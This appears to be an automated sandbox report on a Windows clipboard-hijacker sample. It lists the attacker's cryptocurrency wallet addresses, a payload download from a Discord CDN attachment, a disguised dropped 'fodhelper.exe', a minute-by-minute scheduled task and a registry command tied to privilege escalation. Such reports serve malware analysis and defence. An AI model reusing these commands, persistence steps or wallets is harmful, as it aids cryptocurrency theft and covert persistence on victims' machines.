Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["Ae2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPE", "addr1q9clx0ud02ehvzuqqtqu4tchl6g9kkzllcl2zjpan9kp39m37vlc674nwc9cqqkpe2h30l5stdv9ll3759yrmxtvrztspanadd", "bc1q7hrr7lvjrgdcskmnydwry3629c73qfx9gpk2mc", "cosmos1l8p5237wclrtqf8upw8quwuj32f30zv8gej0jc", "ltc1q0jyf5za7n5pxuz8tgvhzjkaaf5cz5kykp5cd55", "D7Dhy317Lph7ZAx4GALQtYdzcFrx35GSNK", "AYFTxSxSzjDWb2D3fs4TjjsswB41M6Tw6T", "7UT25554RQSTW2S44UVFYWZIZDWQIKUT3O7LG4QBOYDJ7IIEBVFYZZW4YI", "MFxCfYKXwLG1eM93xuNoNCzLoy7an3Ekud", "00000L0000T00MON00000000000000000000000LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ00000000000000W0000000", "D2eMjtv3Fh2EnsZ8SH4FCyvwxNawtpHDxXzBgS4sME4M", "0x4b222739496bcf2AA1F609585dACd8858943B39c", "84VKKNB6tQLam7LPn9PTdKYUfZepoYTfmMMYFEa7btqs7XMqyPWpMdq9FGSvZKsVNgDddtC5JTr1p3ACp9Cbod2f8KABjkw", "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG", "t3SCmhgjNi8B5amJUw61Tc86B9CsTTJvPy7", "TM5d5ZK4uEDe3Ry8gy35nTQLcswbHDzS95", "18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "Z18SJmQtHkoRMaaJSCPHn85u5dgTXTiDBZN", "3JxVQHXyiwwws3Yykkw2sUbRNkgimDi725", "bnb1xw6czzmz0arvpf88ufwj4k0yfwfd8vps9f43xu", "LZRNV3CB6Ei9bZtXDQ2k6Sy7emnNX4rzTQ"]} |
Source: hTu8FeYy28.exe | Virustotal: Detection: 12% |
Source: 17.1.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen |
Source: 17.2.hTu8FeYy28.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack |
Source: hTu8FeYy28.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI |
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49821 version: TLS 1.2 |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 162.159.130.233 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821 |
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822 |
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com |
Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1; User-Agent: lVali; Host: cdn.discordapp.com |
Source: global traffic | HTTP traffic detected: GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1; User-Agent: aswe; Host: cdn.discordapp.com; Cache-Control: no-cache |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401FEF OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard, | 17_2_00401FEF |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401F8B GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree, | 17_2_00401F8B |
Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST |
Source: hTu8FeYy28.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST |
Source: fodhelper.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe 5BC09C3C2A751169A32CF97A62765F127BCE2D0EADCE3481A6A831B6FDCC044E |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Users\user\Desktop\hTu8FeYy28.exe |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales |
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales |
Source: unknown | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe 'C:\Users\user\Desktop\hTu8FeYy28.exe' | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Users\user\Desktop\hTu8FeYy28.exe C:\Users\user\Desktop\hTu8FeYy28.exe | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe' | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' | |
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Mutant created: \Sessions\1\BaseNamedObjects\CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4776:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_01 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Lnouxqkbbgkvxwmwtigvjxpvnenadlc[1] |
Source: classification engine | Classification label: mal92.spyw.evad.winEXE@21/8@1/1 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: hTu8FeYy28.exe | Static file information: File size 1195008 > 1048576 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Unpacked PE file: 17.2.hTu8FeYy28.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R; |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: 17_2_00401000 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 17_2_00401000 |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Code function: GetModuleFileNameW,SHGetFolderPathW,PathAppendW,PathIsDirectoryW,CreateDirectoryW,PathAppendW,StrStrW,CopyFileW,ExitProcess, | 17_2_00401272 |
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed |
Source: C:\Users\user\Desktop\hTu8FeYy28.exe | Memory written: C:\Users\user\Desktop\hTu8FeYy28.exe base: 400000 value starts with: 4D5A |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Program Manager |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progman |
Source: fodhelper.exe, 0000001A.00000002.561710957.0000000000E80000.00000002.00020000.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation |
Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.2.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.1.hTu8FeYy28.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000001.524041171.0000000000400000.00000040.00020000.sdmp, type: MEMORY |